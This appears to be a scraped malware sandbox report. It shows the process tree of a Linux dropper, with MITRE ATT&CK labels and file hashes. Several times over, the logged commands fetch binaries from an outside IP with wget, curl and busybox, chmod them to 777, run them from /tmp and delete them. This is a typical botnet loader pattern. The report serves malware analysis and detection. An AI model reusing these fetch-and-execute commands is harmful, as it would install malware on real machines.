/bin/rmrm 9dsjXqOGAwc5oVOwgdZslmhvXDf4zEHtQI2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:972
-
-
/bin/chmodchmod 777 FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH./FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm FhrvmElgeCBtu5jGJNPC2Ufnurdtfd6qZH2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:978
-
-
/bin/chmodchmod 777 LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/LQM2q0nlR58Eihs83rY31Yor6mBJko63jz./LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm LQM2q0nlR58Eihs83rY31Yor6mBJko63jz2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:984
-
-
/bin/chmodchmod 777 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN./94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm 94awcgiG1pO5maAzGqZuwrc4PsDk3hSOlN2⤵PID:987
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:988
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:990
-
-
/bin/chmodchmod 777 WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM11./WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm WwXoMuGYNX8f1e9ffnbKnvAl45pctZzM112⤵PID:993
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:994
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:995
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:996
-
-
/bin/chmodchmod 777 TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk./TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm TrkNkY0muFuMuhgfC17haSeCR1Dfg6RKVk2⤵PID:999
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:1000
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1001
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:1002
-
-
/bin/chmodchmod 777 cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM./cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm cPlVwFqjUhjwzwO99CrgMEQ4SsNDkpgNmM2⤵PID:1005
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:1006
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1007
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:1008
-
-
/bin/chmodchmod 777 GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- File and Directory Permissions Modification
PID:1009
-
-
/tmp/GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo./GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵
- Executes dropped EXE
PID:1010
-
-
/bin/rmrm GggcVe5nQaWP6A9HFkjbcNtD7gukRYnAQo2⤵PID:1011
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97